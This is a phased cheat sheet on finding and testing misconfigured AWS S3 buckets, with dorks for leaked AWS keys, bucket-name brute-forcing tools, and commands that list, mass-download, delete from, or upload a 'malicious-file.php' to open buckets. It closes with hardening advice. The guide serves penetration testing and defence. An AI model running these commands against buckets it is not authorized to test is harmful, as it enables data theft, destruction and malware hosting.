AWS S3 Buckets

AWS S3 bucket reconnaissance, enumeration, and misconfiguration testing techniques.

Phase 1

Understanding AWS S3 Buckets

1. What is S3 bucket reconnaissance?
S3 bucket reconnaissance is the process of identifying publicly accessible or misconfigured AWS S3 buckets.
2. Purpose of S3 reconnaissance
Helps organizations secure their cloud storage by finding exposed data before attackers do.
3. Test access to a bucket with the AWS CLI
aws s3 ls s3://target-bucket (requires configured credentials)
4. Check if a bucket exists and is accessible (HTTP headers)
curl -I https://target.s3.amazonaws.com
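The curl check above can be wrapped in a small script that interprets the HTTP status code. A minimal sketch (the `classify_status` and `probe_bucket` helpers are illustrative, not part of any official tooling):

```shell
# Map the HTTP status of an unauthenticated S3 probe to a bucket state:
# 200 = publicly listable, 403 = bucket exists but is private, 404 = no such bucket.
classify_status() {
  case "$1" in
    200) echo "public" ;;
    403) echo "exists-private" ;;
    404) echo "not-found" ;;
    *)   echo "unknown" ;;
  esac
}

# Probe a bucket by name (requires network access).
probe_bucket() {
  code=$(curl -s -o /dev/null -w '%{http_code}' "https://$1.s3.amazonaws.com")
  classify_status "$code"
}
```

Usage: `probe_bucket target` prints one of the four states above.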
Phase 2

Manual Methods for Identifying S3 Buckets

1. Test in browser URL bar - basic bucket URL format
https://target.s3.amazonaws.com
2. Alternative bucket URL format (older path style)
https://s3.amazonaws.com/target
3. S3 external endpoint format
https://target.s3-external-1.amazonaws.com
4. Dual-stack endpoint (IPv4 + IPv6)
https://target.s3.dualstack.us-east-1.amazonaws.com
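All four URL formats can be generated at once for a candidate bucket name. A minimal sketch (the function name and default region are illustrative):

```shell
# Emit the candidate S3 endpoint URLs for a bucket name.
# Usage: s3_url_candidates <bucket> [region]
s3_url_candidates() {
  b="$1"
  r="${2:-us-east-1}"
  printf '%s\n' \
    "https://$b.s3.amazonaws.com" \
    "https://s3.amazonaws.com/$b" \
    "https://$b.s3-external-1.amazonaws.com" \
    "https://$b.s3.dualstack.$r.amazonaws.com"
}
```

Usage: `s3_url_candidates target | xargs -n1 curl -s -o /dev/null -w '%{http_code} %{url_effective}\n'` probes each format in turn.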
Phase 3

Google Dorking for AWS S3 Buckets

1. Find S3 buckets related to the target domain
site:s3.amazonaws.com "target.com"
2. Wildcard search for all subdomain buckets
site:*.s3.amazonaws.com "target.com"
3. Search external S3 endpoints
site:s3-external-1.amazonaws.com "target.com"
4. Find buckets with directory listing enabled
site:s3.amazonaws.com intitle:"index of"
5. Search for buckets containing sensitive keywords
site:s3.amazonaws.com "target.com" "bucket" OR "aws_access_key" OR "secret"
6. Broad search across all Amazon AWS domains
site:amazonaws.com inurl:s3.amazonaws.com
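The six dorks above can be emitted for any target domain with a tiny helper, handy for feeding into automation. A sketch (the function name is made up):

```shell
# Print the S3 Google dorks for a target domain, one per line.
s3_dorks() {
  d="$1"
  printf '%s\n' \
    "site:s3.amazonaws.com \"$d\"" \
    "site:*.s3.amazonaws.com \"$d\"" \
    "site:s3-external-1.amazonaws.com \"$d\"" \
    'site:s3.amazonaws.com intitle:"index of"' \
    "site:s3.amazonaws.com \"$d\" \"bucket\" OR \"aws_access_key\" OR \"secret\"" \
    'site:amazonaws.com inurl:s3.amazonaws.com'
}
```

Usage: `s3_dorks target.com > dorks.txt`.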
Phase 4

Automating Google Dorking with DorkEye

1. DorkEye automates Google dorking for faster recon
https://github.com/BullsEye0/dorks-eye
2. Run DorkEye with target domain and output file
python3 dorkeye.py -d target.com -o s3-results.txt
3. Filter results for S3 bucket URLs
grep -i 's3\.amazonaws\.com' s3-results.txt
Phase 5

Using S3Misconfig for Fast Bucket Enumeration

1. S3Misconfig scans for buckets with listing enabled
https://github.com/Atharv834/S3BucketMisconf
2. Scan a list of bucket URLs and generate an HTML report
python3 s3misconfig.py -l bucket-list.txt -o results.html
3. Extract open buckets from the HTML report
grep -iE 'open bucket|listing enabled' results.html
Phase 6

Finding S3 Buckets with HTTPX and Nuclei

1. Use Subfinder + HTTPX to find S3 in page titles
subfinder -d target.com -all -silent | httpx-toolkit -sc -title | grep -iE 'amazon s3|s3\.amazonaws'
2. Scan subdomains with the Nuclei S3 detection template
subfinder -d target.com -all -silent | nuclei -t s3-detect.yaml -o s3-nuclei.txt
3. Filter Nuclei results for S3 findings
grep -iE 's3|bucket' s3-nuclei.txt
Phase 7

Extracting S3 URLs from JavaScript Files with java2s3

1. Katana: tool to crawl a site and extract URLs, including JS files
https://github.com/projectdiscovery/katana
2. Crawl the target and collect JS file URLs
katana -u https://target.com/ -d 5 -jc | grep '\.js$' | tee alljs.txt
3. Extract S3 URLs from all JS files
cat alljs.txt | xargs -I {} curl -s {} | grep -oE 'https?://[^"]*\.s3\.amazonaws\.com[^"]*' | sort -u
4. java2s3: alternative tool for extracting S3 URLs from JS
https://github.com/mexploit30/java2s3
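Once S3 URLs have been collected, the bare bucket names can be pulled out for permission testing in later phases. A sketch (the function name is illustrative; it only handles virtual-hosted-style URLs of the form bucket.s3.amazonaws.com):

```shell
# Read URLs or page content on stdin; print unique bucket names.
extract_bucket_names() {
  grep -oE '[a-zA-Z0-9._-]+\.s3\.amazonaws\.com' |
    sed 's/\.s3\.amazonaws\.com$//' |
    sort -u
}
```

Usage: `extract_bucket_names < s3-urls.txt`.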
Phase 8

Brute-Forcing S3 Bucket Names with LazyS3

1. LazyS3: brute-force tool for AWS S3 bucket names
https://github.com/nahamsec/lazys3
2. Basic LazyS3 run with target domain
ruby lazys3.rb target.com
3. Use a custom wordlist with LazyS3
ruby lazys3.rb target.com -w custom-wordlist.txt
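LazyS3's core idea - permuting a base name with common environment words - can be sketched in a few lines of shell (the suffix list and function name are illustrative, not LazyS3's actual wordlist):

```shell
# Generate candidate bucket names from a base name and common environment words.
s3_permutations() {
  base="$1"
  echo "$base"
  for e in dev staging prod test backup; do
    echo "$base-$e"
    echo "$e-$base"
    echo "$base.$e"
  done
}
```

Usage: `s3_permutations acme > candidates.txt` yields 16 candidates (the base plus three variants per environment word).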
Phase 9

Using CeWL + S3Scanner to find open buckets

1. Generate a custom wordlist from the target website
cewl https://target.com/ -d 3 -m 5 -w cewl-words.txt
2. Combine CeWL output with a generic wordlist
cat cewl-words.txt rockyou.txt | sort -u > final-wordlist.txt
3. S3Scanner: identify valid/invalid S3 buckets with permission checks
https://github.com/sa7mon/S3Scanner
4. Scan the wordlist and enumerate bucket permissions
s3scanner -bucket-file final-wordlist.txt -enumerate -threads 10
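CeWL output often contains capitalized words and characters that are not valid in bucket names, so a normalization pass before scanning avoids wasted requests. A sketch (the function name is made up; the filter approximates S3's naming rules: 3-63 characters, lowercase letters, digits, dots, and hyphens, starting and ending with a letter or digit):

```shell
# Normalize a raw wordlist into plausible S3 bucket names:
# lowercase, strip invalid characters, enforce length rules, dedupe.
normalize_bucket_words() {
  tr 'A-Z' 'a-z' |
    tr -cd 'a-z0-9.\n-' |
    grep -E '^[a-z0-9][a-z0-9.-]{1,61}[a-z0-9]$' |
    sort -u
}
```

Usage: `normalize_bucket_words < final-wordlist.txt > clean-wordlist.txt`.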
Phase 10

Extracting S3 Buckets from GitHub Repositories

1. Search GitHub repos for amazonaws references
org:target "amazonaws"
2. Find exposed AWS access keys in repos
org:target "aws_access_key"
3. Search for various AWS secret key formats
org:target "aws_secret_key" OR "aws_secret" OR "aws_key"
4. Find S3 bucket references in code
org:target "S3_BUCKET"
Phase 11

Websites for Public S3 Bucket Discovery

1. GrayHatWarfare: search public S3 buckets by keyword
https://buckets.grayhatwarfare.com/
2. OSINT.sh: another public S3 bucket search engine
https://osint.sh/buckets/
3. Nuclei template for S3 detection (reference)
https://github.com/coffinxp/nuclei-templates/blob/main/http/technologies/s3-detect.yaml
Phase 12

Finding Hidden S3 URLs with Extensions

1. S3BucketList Chrome extension for finding S3 URLs
https://chromewebstore.google.com/detail/s3bucketlist/anngjobjhcbancaaogmlcffohpmcniki
2. Find S3 URLs with sensitive file extensions
grep -oE 'https?://[^"]*\.s3\.amazonaws\.com/[^"]*\.(zip|tar|gz|sql|env|log|key|pem|bak)' js-files.txt | sort -u
Phase 13

AWS S3 Bucket Listing & File Management

1. List files in a bucket (no credentials needed if public)
aws s3 ls s3://bucket-name --no-sign-request
2. Recursively list all files in human-readable format
aws s3 ls s3://bucket-name --recursive --human-readable --no-sign-request
3. Filter for potentially sensitive files
aws s3 ls s3://bucket-name --recursive --no-sign-request | grep -E '\.(env|pem|key|json|yml|yaml|config|php|ini|sql|db|log|backup|bak|zip|rar|7z|tar|gz)$'
4. Download a specific file from the bucket
aws s3 cp s3://bucket-name/file.txt ./ --no-sign-request
5. Download the entire bucket recursively
aws s3 cp s3://bucket-name/ ./ --recursive --no-sign-request
6. Delete a file (only if WRITE permission exists - for authorized testing only!)
aws s3 rm s3://bucket-name/file.txt --no-sign-request
Phase 14

Exploiting Misconfigured Buckets

1. Public READ = anyone can list and download files
Risk: data exfiltration, sensitive info disclosure
2. Public WRITE = anyone can upload files to the bucket
Risk: malware hosting, defacement, data poisoning
3. Public FULL_CONTROL = read + write + delete permissions
Risk: complete bucket takeover, data destruction possible
4. EXAMPLE: upload a file if WRITE permission exists (for authorized testing only!)
aws s3 cp malicious-file.php s3://bucket-name/ --no-sign-request
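The three misconfiguration classes above can be probed systematically. A hedged sketch assuming the aws CLI is installed (`perm_label`, `probe_perms`, and the marker-file convention are made up for illustration; only run this against buckets you are authorized to test):

```shell
# Pure helper: turn read/write probe results (0 = allowed) into a risk label.
perm_label() {
  case "$1$2" in
    00) echo "READ+WRITE (possible takeover)" ;;
    0*) echo "READ only (data disclosure)" ;;
    *0) echo "WRITE only (data poisoning)" ;;
    *)  echo "no public access detected" ;;
  esac
}

# Probe a bucket: try an unauthenticated list, then a harmless marker upload
# that is deleted immediately if it succeeds. Requires network + aws CLI.
probe_perms() {
  b="$1"; marker="authorized-poc-$$.txt"; r=1; w=1
  aws s3 ls "s3://$b" --no-sign-request >/dev/null 2>&1 && r=0
  echo "authorized test marker" > "/tmp/$marker"
  if aws s3 cp "/tmp/$marker" "s3://$b/$marker" --no-sign-request >/dev/null 2>&1; then
    w=0
    aws s3 rm "s3://$b/$marker" --no-sign-request >/dev/null 2>&1
  fi
  rm -f "/tmp/$marker"
  perm_label "$r" "$w"
}
```

Usage: `probe_perms bucket-name` prints one of the four labels.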
Phase 15

Securing S3 Buckets

1. Use IAM policies to strictly control who can access the bucket
Enable bucket policies and restrict access
2. Avoid using public-read or public-read-write ACLs
Disable public ACLs unless necessary
3. Enable logging to detect unauthorized access attempts
Monitor logs using AWS CloudTrail
4. Use S3 server-side encryption or client-side encryption
Implement encryption for sensitive data
5. Enable S3 Block Public Access to prevent accidental exposure
Use S3 Block Public Access at the account level
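The last recommendation maps to a single configuration call per bucket. A sketch assuming the aws CLI and sufficient IAM permissions (the bucket name is a placeholder):

```shell
# Turn on all four Block Public Access settings for one bucket.
aws s3api put-public-access-block \
  --bucket example-bucket \
  --public-access-block-configuration \
    "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

# Verify the configuration took effect.
aws s3api get-public-access-block --bucket example-bucket
```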